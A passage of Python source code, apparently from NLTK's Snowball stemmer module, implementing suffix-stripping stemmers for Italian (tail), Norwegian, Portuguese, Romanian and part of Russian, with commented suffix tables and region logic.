                elif r2.endswith(suffix):
                    step1_success = True
                    if suffix in ("azione", "azioni", "atore", "atori"):
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]

                        if r2.endswith("ic"):
                            word = word[:-2]
                            rv = rv[:-2]

                    elif suffix in ("logia", "logie"):
                        # logia/logie -> log (delete the final 'ia'/'ie').
                        word = word[:-2]
                        # BUG FIX: was `rv = word[:-2]`, which replaced the
                        # RV region with nearly the whole word and wrongly
                        # enabled later RV-conditioned deletions. RV must
                        # shrink by the same 2 chars as `word`, as in every
                        # sibling branch.
                        rv = rv[:-2]

                    elif suffix in ("uzione", "uzioni",
                                    "usione", "usioni"):
                        word = word[:-5]
                        rv = rv[:-5]

                    elif suffix in ("enza", "enze"):
                        word = suffix_replace(word, suffix, "te")
                        rv = suffix_replace(rv, suffix, "te")

                    elif suffix == "it\xE0":
                        word = word[:-3]
                        r2 = r2[:-3]
                        rv = rv[:-3]

                        if r2.endswith(("ic", "iv")):
                            word = word[:-2]
                            rv = rv[:-2]

                        elif r2.endswith("abil"):
                            word = word[:-4]
                            rv = rv[:-4]

                    elif suffix in ("ivo", "ivi", "iva", "ive"):
                        word = word[:-3]
                        r2 = r2[:-3]
                        rv = rv[:-3]

                        if r2.endswith("at"):
                            word = word[:-2]
                            r2 = r2[:-2]
                            rv = rv[:-2]

                            if r2.endswith("ic"):
                                word = word[:-2]
                                rv = rv[:-2]
                    else:
                        word = word[:-len(suffix)]
                        rv = rv[:-len(suffix)]
                break

        # STEP 2: Verb suffixes
        if not step1_success:
            for suffix in self.__step2_suffixes:
                if rv.endswith(suffix):
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    break

        # STEP 3a: Delete a final vowel (and a final 'i' after it) in RV.
        if rv.endswith(("a", "e", "i", "o", "\xE0", "\xE8",
                        "\xEC", "\xF2")):
            word = word[:-1]
            rv = rv[:-1]

            if rv.endswith("i"):
                word = word[:-1]
                rv = rv[:-1]

        # STEP 3b: ch/gh -> c/g in RV.
        if rv.endswith(("ch", "gh")):
            word = word[:-1]

        # Restore the consonant markers introduced at the top.
        word = word.replace("I", "i").replace("U", "u")

        return word
class NorwegianStemmer(_ScandinavianStemmer):
    """
    Snowball stemmer for Norwegian.

    The suffix tuples below are ordered longest-first so that the first
    match found in each step is the longest applicable suffix.

    :cvar __vowels: The Norwegian vowels.
    :type __vowels: unicode
    :cvar __s_ending: Letters that may directly appear before a word final 's'.
    :type __s_ending: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the Norwegian
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/norwegian/stemmer.html
    """

    __vowels = "aeiouy\xE6\xE5\xF8"
    __s_ending = "bcdfghjlmnoprtvyz"
    __step1_suffixes = ("hetenes", "hetene", "hetens", "heter",
                        "heten", "endes", "ande", "ende", "edes",
                        "enes", "erte", "ede", "ane", "ene", "ens",
                        "ers", "ets", "het", "ast", "ert", "en",
                        "ar", "er", "as", "es", "et", "a", "e", "s")

    __step2_suffixes = ("dt", "vt")

    __step3_suffixes = ("hetslov", "eleg", "elig", "elov", "slov",
                        "leg", "eig", "lig", "els", "lov", "ig")

    def stem(self, word):
        """
        Stem a Norwegian word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        # R1 is the region after the first non-vowel following a vowel
        # (with the Scandinavian minimum-length adjustment).
        r1 = self._r1_scandinavian(word, self.__vowels)

        # STEP 1: remove the longest noun/adjective ending found in R1.
        for suffix in self.__step1_suffixes:
            if not r1.endswith(suffix):
                continue

            if suffix in ("erte", "ert"):
                # Past-tense endings are mapped to "er", not deleted.
                word = suffix_replace(word, suffix, "er")
                r1 = suffix_replace(r1, suffix, "er")
            elif suffix == "s":
                # A final 's' only comes off after a valid s-ending
                # letter, or after 'k' preceded by a non-vowel.
                removable = word[-2] in self.__s_ending
                if not removable:
                    removable = (word[-2] == "k" and
                                 word[-3] not in self.__vowels)
                if removable:
                    word = word[:-1]
                    r1 = r1[:-1]
            else:
                word = word[:-len(suffix)]
                r1 = r1[:-len(suffix)]
            break

        # STEP 2: for "dt"/"vt" at the end of R1, drop only the final 't'.
        for suffix in self.__step2_suffixes:
            if r1.endswith(suffix):
                word = word[:-1]
                r1 = r1[:-1]
                break

        # STEP 3: delete derivational endings found in R1.
        for suffix in self.__step3_suffixes:
            if r1.endswith(suffix):
                word = word[:-len(suffix)]
                break

        return word
class PortugueseStemmer(_StandardStemmer):
    """
    The Portuguese Snowball stemmer.

    :cvar __vowels: The Portuguese vowels.
    :type __vowels: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
    :type __step4_suffixes: tuple
    :note: A detailed description of the Portuguese
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/portuguese/stemmer.html
    """

    __vowels = "aeiou\xE1\xE9\xED\xF3\xFA\xE2\xEA\xF4"

    # NOTE: all suffix tuples are ordered longest-first; each matching
    # loop breaks on the first (i.e. longest) match, so the order is
    # semantically significant.
    __step1_suffixes = ('amentos', 'imentos', 'uço~es', 'amento',
                        'imento', 'adoras', 'adores', 'a\xE7o~es',
                        'logias', '\xEAncias', 'amente',
                        'idades', 'an\xE7as', 'ismos', 'istas', 'adora',
                        'a\xE7a~o', 'antes', '\xE2ncia',
                        'logia', 'uça~o', '\xEAncia',
                        'mente', 'idade', 'an\xE7a', 'ezas', 'icos', 'icas',
                        'ismo', '\xE1vel', '\xEDvel', 'ista',
                        'osos', 'osas', 'ador', 'ante', 'ivas',
                        'ivos', 'iras', 'eza', 'ico', 'ica',
                        'oso', 'osa', 'iva', 'ivo', 'ira')

    __step2_suffixes = ('ar\xEDamos', 'er\xEDamos', 'ir\xEDamos',
                        '\xE1ssemos', '\xEAssemos', '\xEDssemos',
                        'ar\xEDeis', 'er\xEDeis', 'ir\xEDeis',
                        '\xE1sseis', '\xE9sseis', '\xEDsseis',
                        '\xE1ramos', '\xE9ramos', '\xEDramos',
                        '\xE1vamos', 'aremos', 'eremos', 'iremos',
                        'ariam', 'eriam', 'iriam', 'assem', 'essem',
                        'issem', 'ara~o', 'era~o', 'ira~o', 'arias',
                        'erias', 'irias', 'ardes', 'erdes', 'irdes',
                        'asses', 'esses', 'isses', 'astes', 'estes',
                        'istes', '\xE1reis', 'areis', '\xE9reis',
                        'ereis', '\xEDreis', 'ireis', '\xE1veis',
                        '\xEDamos', 'armos', 'ermos', 'irmos',
                        'aria', 'eria', 'iria', 'asse', 'esse',
                        'isse', 'aste', 'este', 'iste', 'arei',
                        'erei', 'irei', 'aram', 'eram', 'iram',
                        'avam', 'arem', 'erem', 'irem',
                        'ando', 'endo', 'indo', 'adas', 'idas',
                        'ar\xE1s', 'aras', 'er\xE1s', 'eras',
                        'ir\xE1s', 'avas', 'ares', 'eres', 'ires',
                        '\xEDeis', 'ados', 'idos', '\xE1mos',
                        'amos', 'emos', 'imos', 'iras', 'ada', 'ida',
                        'ar\xE1', 'ara', 'er\xE1', 'era',
                        'ir\xE1', 'ava', 'iam', 'ado', 'ido',
                        'ias', 'ais', 'eis', 'ira', 'ia', 'ei', 'am',
                        'em', 'ar', 'er', 'ir', 'as',
                        'es', 'is', 'eu', 'iu', 'ou')

    __step4_suffixes = ("os", "a", "i", "o", "\xE1",
                        "\xED", "\xF3")

    def stem(self, word):
        """
        Stem a Portuguese word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        step1_success = False
        step2_success = False

        # Nasalised vowels are rewritten with ASCII two-char markers
        # ("a~", "o~") so the suffix tables can match them; the markers
        # are mapped back just before returning.
        word = (word.replace("\xE3", "a~")
                .replace("\xF5", "o~")
                .replace("q\xFC", "qu")
                .replace("g\xFC", "gu"))

        # R1/R2/RV are the standard Snowball regions; all four strings
        # (word, r1, r2, rv) are truncated in lockstep below.
        r1, r2 = self._r1r2_standard(word, self.__vowels)
        rv = self._rv_standard(word, self.__vowels)

        # STEP 1: Standard suffix removal
        for suffix in self.__step1_suffixes:
            if word.endswith(suffix):
                if suffix == "amente" and r1.endswith(suffix):
                    step1_success = True

                    word = word[:-6]
                    r2 = r2[:-6]
                    rv = rv[:-6]

                    # Strip a preceding derivational element if still in R2.
                    if r2.endswith("iv"):
                        word = word[:-2]
                        r2 = r2[:-2]
                        rv = rv[:-2]

                        if r2.endswith("at"):
                            word = word[:-2]
                            rv = rv[:-2]
                    elif r2.endswith(("os", "ic", "ad")):
                        word = word[:-2]
                        rv = rv[:-2]

                elif (suffix in ("ira", "iras") and rv.endswith(suffix) and
                      word[-len(suffix)-1:-len(suffix)] == "e"):
                    # "eira(s)" -> "eir": only when preceded by 'e'.
                    step1_success = True

                    word = suffix_replace(word, suffix, "ir")
                    rv = suffix_replace(rv, suffix, "ir")

                elif r2.endswith(suffix):
                    step1_success = True

                    if suffix in ("logia", "logias"):
                        word = suffix_replace(word, suffix, "log")
                        rv = suffix_replace(rv, suffix, "log")

                    elif suffix in ("uça~o", "uço~es"):
                        word = suffix_replace(word, suffix, "u")
                        rv = suffix_replace(rv, suffix, "u")

                    elif suffix in ("\xEAncia", "\xEAncias"):
                        word = suffix_replace(word, suffix, "ente")
                        rv = suffix_replace(rv, suffix, "ente")

                    elif suffix == "mente":
                        word = word[:-5]
                        r2 = r2[:-5]
                        rv = rv[:-5]

                        if r2.endswith(("ante", "avel", "ivel")):
                            word = word[:-4]
                            rv = rv[:-4]

                    elif suffix in ("idade", "idades"):
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]

                        if r2.endswith(("ic", "iv")):
                            word = word[:-2]
                            rv = rv[:-2]

                        elif r2.endswith("abil"):
                            word = word[:-4]
                            rv = rv[:-4]

                    elif suffix in ("iva", "ivo", "ivas", "ivos"):
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]

                        if r2.endswith("at"):
                            word = word[:-2]
                            rv = rv[:-2]
                    else:
                        word = word[:-len(suffix)]
                        rv = rv[:-len(suffix)]
                break

        # STEP 2: Verb suffixes — only attempted if step 1 removed nothing.
        if not step1_success:
            for suffix in self.__step2_suffixes:
                if rv.endswith(suffix):
                    step2_success = True

                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    break

        # STEP 3: delete a final 'i' left behind after 'c' by steps 1/2.
        if step1_success or step2_success:
            if rv.endswith("i") and word[-2] == "c":
                word = word[:-1]
                rv = rv[:-1]

        # STEP 4: Residual suffix — only if neither step 1 nor 2 fired.
        if not step1_success and not step2_success:
            for suffix in self.__step4_suffixes:
                if rv.endswith(suffix):
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    break

        # STEP 5: final 'e'/'é'/'ê' removal and ç -> c normalisation.
        if rv.endswith(("e", "\xE9", "\xEA")):
            word = word[:-1]
            rv = rv[:-1]

            if ((word.endswith("gu") and rv.endswith("u")) or
                (word.endswith("ci") and rv.endswith("i"))):
                word = word[:-1]

        elif word.endswith("\xE7"):
            word = suffix_replace(word, "\xE7", "c")

        # Restore the nasalised vowels rewritten at the start.
        word = word.replace("a~", "\xE3").replace("o~", "\xF5")

        return word
class RomanianStemmer(_StandardStemmer):
    """
    The Romanian Snowball stemmer.

    :cvar __vowels: The Romanian vowels.
    :type __vowels: unicode
    :cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
    :type __step0_suffixes: tuple
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the Romanian
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/romanian/stemmer.html
    """

    __vowels = "aeiou\u0103\xE2\xEE"

    # All suffix tuples are ordered longest-first; each matching loop
    # breaks on the first (longest) match, so order is significant.
    __step0_suffixes = ('iilor', 'ului', 'elor', 'iile', 'ilor',
                        'atei', 'a\u0163ie', 'a\u0163ia', 'aua',
                        'ele', 'iua', 'iei', 'ile', 'ul', 'ea',
                        'ii')

    __step1_suffixes = ('abilitate', 'abilitati', 'abilit\u0103\u0163i',
                        'ibilitate', 'abilit\u0103i', 'ivitate',
                        'ivitati', 'ivit\u0103\u0163i', 'icitate',
                        'icitati', 'icit\u0103\u0163i', 'icatori',
                        'ivit\u0103i', 'icit\u0103i', 'icator',
                        'a\u0163iune', 'atoare', '\u0103toare',
                        'i\u0163iune', 'itoare', 'iciva', 'icive',
                        'icivi', 'iciv\u0103', 'icala', 'icale',
                        'icali', 'ical\u0103', 'ativa', 'ative',
                        'ativi', 'ativ\u0103', 'atori', '\u0103tori',
                        'itiva', 'itive', 'itivi', 'itiv\u0103',
                        'itori', 'iciv', 'ical', 'ativ', 'ator',
                        '\u0103tor', 'itiv', 'itor')

    __step2_suffixes = ('abila', 'abile', 'abili', 'abil\u0103',
                        'ibila', 'ibile', 'ibili', 'ibil\u0103',
                        'atori', 'itate', 'itati', 'it\u0103\u0163i',
                        'abil', 'ibil', 'oasa', 'oas\u0103', 'oase',
                        'anta', 'ante', 'anti', 'ant\u0103', 'ator',
                        'it\u0103i', 'iune', 'iuni', 'isme', 'ista',
                        'iste', 'isti', 'ist\u0103', 'i\u015Fti',
                        'ata', 'at\u0103', 'ati', 'ate', 'uta',
                        'ut\u0103', 'uti', 'ute', 'ita', 'it\u0103',
                        'iti', 'ite', 'ica', 'ice', 'ici', 'ic\u0103',
                        'osi', 'o\u015Fi', 'ant', 'iva', 'ive', 'ivi',
                        'iv\u0103', 'ism', 'ist', 'at', 'ut', 'it',
                        'ic', 'os', 'iv')

    __step3_suffixes = ('seser\u0103\u0163i', 'aser\u0103\u0163i',
                        'iser\u0103\u0163i', '\xE2ser\u0103\u0163i',
                        'user\u0103\u0163i', 'seser\u0103m',
                        'aser\u0103m', 'iser\u0103m', '\xE2ser\u0103m',
                        'user\u0103m', 'ser\u0103\u0163i', 'sese\u015Fi',
                        'seser\u0103', 'easc\u0103', 'ar\u0103\u0163i',
                        'ur\u0103\u0163i', 'ir\u0103\u0163i',
                        '\xE2r\u0103\u0163i', 'ase\u015Fi',
                        'aser\u0103', 'ise\u015Fi', 'iser\u0103',
                        '\xe2se\u015Fi', '\xE2ser\u0103',
                        'use\u015Fi', 'user\u0103', 'ser\u0103m',
                        'sesem', 'indu', '\xE2ndu', 'eaz\u0103',
                        'e\u015Fti', 'e\u015Fte', '\u0103\u015Fti',
                        '\u0103\u015Fte', 'ea\u0163i', 'ia\u0163i',
                        'ar\u0103m', 'ur\u0103m', 'ir\u0103m',
                        '\xE2r\u0103m', 'asem', 'isem',
                        '\xE2sem', 'usem', 'se\u015Fi', 'ser\u0103',
                        'sese', 'are', 'ere', 'ire', '\xE2re',
                        'ind', '\xE2nd', 'eze', 'ezi', 'esc',
                        '\u0103sc', 'eam', 'eai', 'eau', 'iam',
                        'iai', 'iau', 'a\u015Fi', 'ar\u0103',
                        'u\u015Fi', 'ur\u0103', 'i\u015Fi', 'ir\u0103',
                        '\xE2\u015Fi', '\xe2r\u0103', 'ase',
                        'ise', '\xE2se', 'use', 'a\u0163i',
                        'e\u0163i', 'i\u0163i', '\xe2\u0163i', 'sei',
                        'ez', 'am', 'ai', 'au', 'ea', 'ia', 'ui',
                        '\xE2i', '\u0103m', 'em', 'im', '\xE2m',
                        'se')

    def stem(self, word):
        """
        Stem a Romanian word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        step1_success = False
        step2_success = False

        # Intervocalic 'u' and 'i' act as consonants; mark them with
        # uppercase so the region helpers do not treat them as vowels.
        # The marks are undone just before returning.
        for i in range(1, len(word)-1):
            if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
                if word[i] == "u":
                    word = "".join((word[:i], "U", word[i+1:]))

                elif word[i] == "i":
                    word = "".join((word[:i], "I", word[i+1:]))

        r1, r2 = self._r1r2_standard(word, self.__vowels)
        rv = self._rv_standard(word, self.__vowels)

        # STEP 0: Removal of plurals and other simplifications
        for suffix in self.__step0_suffixes:
            if word.endswith(suffix):
                if suffix in r1:
                    if suffix in ("ul", "ului"):
                        word = word[:-len(suffix)]

                        # Keep rv consistent with word; if the suffix is
                        # not inside rv the region is exhausted.
                        if suffix in rv:
                            rv = rv[:-len(suffix)]
                        else:
                            rv = ""

                    elif (suffix == "aua" or suffix == "atei" or
                          (suffix == "ile" and word[-5:-3] != "ab")):
                        word = word[:-2]

                    elif suffix in ("ea", "ele", "elor"):
                        word = suffix_replace(word, suffix, "e")

                        if suffix in rv:
                            rv = suffix_replace(rv, suffix, "e")
                        else:
                            rv = ""

                    elif suffix in ("ii", "iua", "iei",
                                    "iile", "iilor", "ilor"):
                        word = suffix_replace(word, suffix, "i")

                        if suffix in rv:
                            rv = suffix_replace(rv, suffix, "i")
                        else:
                            rv = ""

                    elif suffix in ("a\u0163ie", "a\u0163ia"):
                        word = word[:-1]
                break

        # STEP 1: Reduction of combining suffixes
        # Repeat until no replacement fires; each replacement may expose
        # another reducible suffix.
        while True:

            replacement_done = False

            for suffix in self.__step1_suffixes:
                if word.endswith(suffix):
                    if suffix in r1:
                        step1_success = True
                        replacement_done = True

                        if suffix in ("abilitate", "abilitati",
                                      "abilit\u0103i",
                                      "abilit\u0103\u0163i"):
                            word = suffix_replace(word, suffix, "abil")

                        elif suffix == "ibilitate":
                            word = word[:-5]

                        elif suffix in ("ivitate", "ivitati",
                                        "ivit\u0103i",
                                        "ivit\u0103\u0163i"):
                            word = suffix_replace(word, suffix, "iv")

                        elif suffix in ("icitate", "icitati", "icit\u0103i",
                                        "icit\u0103\u0163i", "icator",
                                        "icatori", "iciv", "iciva",
                                        "icive", "icivi", "iciv\u0103",
                                        "ical", "icala", "icale", "icali",
                                        "ical\u0103"):
                            word = suffix_replace(word, suffix, "ic")

                        elif suffix in ("ativ", "ativa", "ative", "ativi",
                                        "ativ\u0103", "a\u0163iune",
                                        "atoare", "ator", "atori",
                                        "\u0103toare",
                                        "\u0103tor", "\u0103tori"):
                            word = suffix_replace(word, suffix, "at")

                            if suffix in r2:
                                r2 = suffix_replace(r2, suffix, "at")

                        elif suffix in ("itiv", "itiva", "itive", "itivi",
                                        "itiv\u0103", "i\u0163iune",
                                        "itoare", "itor", "itori"):
                            word = suffix_replace(word, suffix, "it")

                            if suffix in r2:
                                r2 = suffix_replace(r2, suffix, "it")
                    else:
                        step1_success = False
                    break

            if not replacement_done:
                break

        # STEP 2: Removal of standard suffixes
        for suffix in self.__step2_suffixes:
            if word.endswith(suffix):
                if suffix in r2:
                    step2_success = True

                    if suffix in ("iune", "iuni"):
                        if word[-5] == "\u0163":
                            word = "".join((word[:-5], "t"))

                    elif suffix in ("ism", "isme", "ist", "ista", "iste",
                                    "isti", "ist\u0103", "i\u015Fti"):
                        word = suffix_replace(word, suffix, "ist")

                    else:
                        word = word[:-len(suffix)]
                break

        # STEP 3: Removal of verb suffixes — only if steps 1 and 2 failed.
        if not step1_success and not step2_success:
            for suffix in self.__step3_suffixes:
                if word.endswith(suffix):
                    if suffix in rv:
                        if suffix in ('seser\u0103\u0163i', 'seser\u0103m',
                                      'ser\u0103\u0163i', 'sese\u015Fi',
                                      'seser\u0103', 'ser\u0103m', 'sesem',
                                      'se\u015Fi', 'ser\u0103', 'sese',
                                      'a\u0163i', 'e\u0163i', 'i\u0163i',
                                      '\xE2\u0163i', 'sei', '\u0103m',
                                      'em', 'im', '\xE2m', 'se'):
                            word = word[:-len(suffix)]
                            rv = rv[:-len(suffix)]
                        else:
                            # Other verb endings are removed only when
                            # preceded (in rv) by a consonant or 'u'.
                            if (not rv.startswith(suffix) and
                                rv[rv.index(suffix)-1] not in
                                "aeio\u0103\xE2\xEE"):
                                word = word[:-len(suffix)]
                        break

        # STEP 4: Removal of final vowel
        for suffix in ("ie", "a", "e", "i", "\u0103"):
            if word.endswith(suffix):
                if suffix in rv:
                    word = word[:-len(suffix)]
                break

        # Undo the intervocalic consonant marks applied at the start.
        word = word.replace("I", "i").replace("U", "u")

        return word
class RussianStemmer(_LanguageSpecificStemmer):
    """
    The Russian Snowball stemmer.

    :cvar __perfective_gerund_suffixes: Suffixes to be deleted.
    :type __perfective_gerund_suffixes: tuple
    :cvar __adjectival_suffixes: Suffixes to be deleted.
    :type __adjectival_suffixes: tuple
    :cvar __reflexive_suffixes: Suffixes to be deleted.
    :type __reflexive_suffixes: tuple
    :cvar __verb_suffixes: Suffixes to be deleted.
    :type __verb_suffixes: tuple
    :cvar __noun_suffixes: Suffixes to be deleted.
    :type __noun_suffixes: tuple
    :cvar __superlative_suffixes: Suffixes to be deleted.
    :type __superlative_suffixes: tuple
    :cvar __derivational_suffixes: Suffixes to be deleted.
    :type __derivational_suffixes: tuple
    :note: A detailed description of the Russian
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/russian/stemmer.html
    """

    # Suffixes are stored in a romanized form (see __cyrillic_to_roman):
    # multi-letter Cyrillic sounds become ASCII digraphs such as "i^a"
    # (я), "i^u" (ю), "i`" (й) and "'" (ь). Tuples are ordered
    # longest-first; matching loops break at the first (longest) match.
    __perfective_gerund_suffixes = ("ivshis'", "yvshis'", "vshis'",
                                    "ivshi", "yvshi", "vshi", "iv",
                                    "yv", "v")
    __adjectival_suffixes = ('ui^ushchi^ui^u', 'ui^ushchi^ai^a',
                             'ui^ushchimi', 'ui^ushchymi', 'ui^ushchego',
                             'ui^ushchogo', 'ui^ushchemu', 'ui^ushchomu',
                             'ui^ushchikh', 'ui^ushchykh',
                             'ui^ushchui^u', 'ui^ushchaia',
                             'ui^ushchoi^u', 'ui^ushchei^u',
                             'i^ushchi^ui^u', 'i^ushchi^ai^a',
                             'ui^ushchee', 'ui^ushchie',
                             'ui^ushchye', 'ui^ushchoe', 'ui^ushchei`',
                             'ui^ushchii`', 'ui^ushchyi`',
                             'ui^ushchoi`', 'ui^ushchem', 'ui^ushchim',
                             'ui^ushchym', 'ui^ushchom', 'i^ushchimi',
                             'i^ushchymi', 'i^ushchego', 'i^ushchogo',
                             'i^ushchemu', 'i^ushchomu', 'i^ushchikh',
                             'i^ushchykh', 'i^ushchui^u', 'i^ushchai^a',
                             'i^ushchoi^u', 'i^ushchei^u', 'i^ushchee',
                             'i^ushchie', 'i^ushchye', 'i^ushchoe',
                             'i^ushchei`', 'i^ushchii`',
                             'i^ushchyi`', 'i^ushchoi`', 'i^ushchem',
                             'i^ushchim', 'i^ushchym', 'i^ushchom',
                             'shchi^ui^u', 'shchi^ai^a', 'ivshi^ui^u',
                             'ivshi^ai^a', 'yvshi^ui^u', 'yvshi^ai^a',
                             'shchimi', 'shchymi', 'shchego', 'shchogo',
                             'shchemu', 'shchomu', 'shchikh', 'shchykh',
                             'shchui^u', 'shchai^a', 'shchoi^u',
                             'shchei^u', 'ivshimi', 'ivshymi',
                             'ivshego', 'ivshogo', 'ivshemu', 'ivshomu',
                             'ivshikh', 'ivshykh', 'ivshui^u',
                             'ivshai^a', 'ivshoi^u', 'ivshei^u',
                             'yvshimi', 'yvshymi', 'yvshego', 'yvshogo',
                             'yvshemu', 'yvshomu', 'yvshikh', 'yvshykh',
                             'yvshui^u', 'yvshai^a', 'yvshoi^u',
                             'yvshei^u', 'vshi^ui^u', 'vshi^ai^a',
                             'shchee', 'shchie', 'shchye', 'shchoe',
                             'shchei`', 'shchii`', 'shchyi`', 'shchoi`',
                             'shchem', 'shchim', 'shchym', 'shchom',
                             'ivshee', 'ivshie', 'ivshye', 'ivshoe',
                             'ivshei`', 'ivshii`', 'ivshyi`',
                             'ivshoi`', 'ivshem', 'ivshim', 'ivshym',
                             'ivshom', 'yvshee', 'yvshie', 'yvshye',
                             'yvshoe', 'yvshei`', 'yvshii`',
                             'yvshyi`', 'yvshoi`', 'yvshem',
                             'yvshim', 'yvshym', 'yvshom', 'vshimi',
                             'vshymi', 'vshego', 'vshogo', 'vshemu',
                             'vshomu', 'vshikh', 'vshykh', 'vshui^u',
                             'vshai^a', 'vshoi^u', 'vshei^u',
                             'emi^ui^u', 'emi^ai^a', 'nni^ui^u',
                             'nni^ai^a', 'vshee',
                             'vshie', 'vshye', 'vshoe', 'vshei`',
                             'vshii`', 'vshyi`', 'vshoi`',
                             'vshem', 'vshim', 'vshym', 'vshom',
                             'emimi', 'emymi', 'emego', 'emogo',
                             'ememu', 'emomu', 'emikh', 'emykh',
                             'emui^u', 'emai^a', 'emoi^u', 'emei^u',
                             'nnimi', 'nnymi', 'nnego', 'nnogo',
                             'nnemu', 'nnomu', 'nnikh', 'nnykh',
                             'nnui^u', 'nnai^a', 'nnoi^u', 'nnei^u',
                             'emee', 'emie', 'emye', 'emoe',
                             'emei`', 'emii`', 'emyi`',
                             'emoi`', 'emem', 'emim', 'emym',
                             'emom', 'nnee', 'nnie', 'nnye', 'nnoe',
                             'nnei`', 'nnii`', 'nnyi`',
                             'nnoi`', 'nnem', 'nnim', 'nnym',
                             'nnom', 'i^ui^u', 'i^ai^a', 'imi', 'ymi',
                             'ego', 'ogo', 'emu', 'omu', 'ikh',
                             'ykh', 'ui^u', 'ai^a', 'oi^u', 'ei^u',
                             'ee', 'ie', 'ye', 'oe', 'ei`',
                             'ii`', 'yi`', 'oi`', 'em',
                             'im', 'ym', 'om')
    __reflexive_suffixes = ("si^a", "s'")
    __verb_suffixes = ("esh'", 'ei`te', 'ui`te', 'ui^ut',
                       "ish'", 'ete', 'i`te', 'i^ut', 'nno',
                       'ila', 'yla', 'ena', 'ite', 'ili', 'yli',
                       'ilo', 'ylo', 'eno', 'i^at', 'uet', 'eny',
                       "it'", "yt'", 'ui^u', 'la', 'na', 'li',
                       'em', 'lo', 'no', 'et', 'ny', "t'",
                       'ei`', 'ui`', 'il', 'yl', 'im',
                       'ym', 'en', 'it', 'yt', 'i^u', 'i`',
                       'l', 'n')
    __noun_suffixes = ('ii^ami', 'ii^akh', 'i^ami', 'ii^am', 'i^akh',
                       'ami', 'iei`', 'i^am', 'iem', 'akh',
                       'ii^u', "'i^u", 'ii^a', "'i^a", 'ev', 'ov',
                       'ie', "'e", 'ei', 'ii', 'ei`',
                       'oi`', 'ii`', 'em', 'am', 'om',
                       'i^u', 'i^a', 'a', 'e', 'i', 'i`',
                       'o', 'u', 'y', "'")
    __superlative_suffixes = ("ei`she", "ei`sh")
    __derivational_suffixes = ("ost'", "ost")

    def stem(self, word):
        """
        Stem a Russian word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        if word in self.stopwords:
            return word

        # Cyrillic input (code points above Latin-1) is transliterated to
        # the romanized form the suffix tables use, and converted back at
        # the end.
        chr_exceeded = False
        for i in range(len(word)):
            if ord(word[i]) > 255:
                chr_exceeded = True
                break

        if chr_exceeded:
            word = self.__cyrillic_to_roman(word)

        step1_success = False
        adjectival_removed = False
        verb_removed = False
        undouble_success = False
        superlative_removed = False

        rv, r2 = self.__regions_russian(word)

        # Step 1: perfective gerund endings. The group-1 endings
        # ("v", "vshi", "vshis'") are only removed when preceded by
        # "a"/"i^a" (Cyrillic а/я).
        for suffix in self.__perfective_gerund_suffixes:
            if rv.endswith(suffix):
                if suffix in ("v", "vshi", "vshis'"):
                    if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
                        rv[-len(suffix)-1:-len(suffix)] == "a"):
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]
                        step1_success = True
                        break
                else:
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    step1_success = True
                    break

        # If no perfective gerund was removed, try (in order): reflexive,
        # adjectival, verb, then noun endings.
        if not step1_success:
            for suffix in self.__reflexive_suffixes:
                if rv.endswith(suffix):
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    break

            for suffix in self.__adjectival_suffixes:
                if rv.endswith(suffix):
                    # Participle-based adjectival endings (this subset)
                    # require a preceding "a"/"i^a", like step 1 group 1.
                    if suffix in ('i^ushchi^ui^u', 'i^ushchi^ai^a',
                                  'i^ushchui^u', 'i^ushchai^a', 'i^ushchoi^u',
                                  'i^ushchei^u', 'i^ushchimi', 'i^ushchymi',
                                  'i^ushchego', 'i^ushchogo', 'i^ushchemu',
                                  'i^ushchomu', 'i^ushchikh', 'i^ushchykh',
                                  'shchi^ui^u', 'shchi^ai^a', 'i^ushchee',
                                  'i^ushchie', 'i^ushchye', 'i^ushchoe',
                                  'i^ushchei`', 'i^ushchii`', 'i^ushchyi`',
                                  'i^ushchoi`', 'i^ushchem', 'i^ushchim',
                                  'i^ushchym', 'i^ushchom', 'vshi^ui^u',
                                  'vshi^ai^a', 'shchui^u', 'shchai^a',
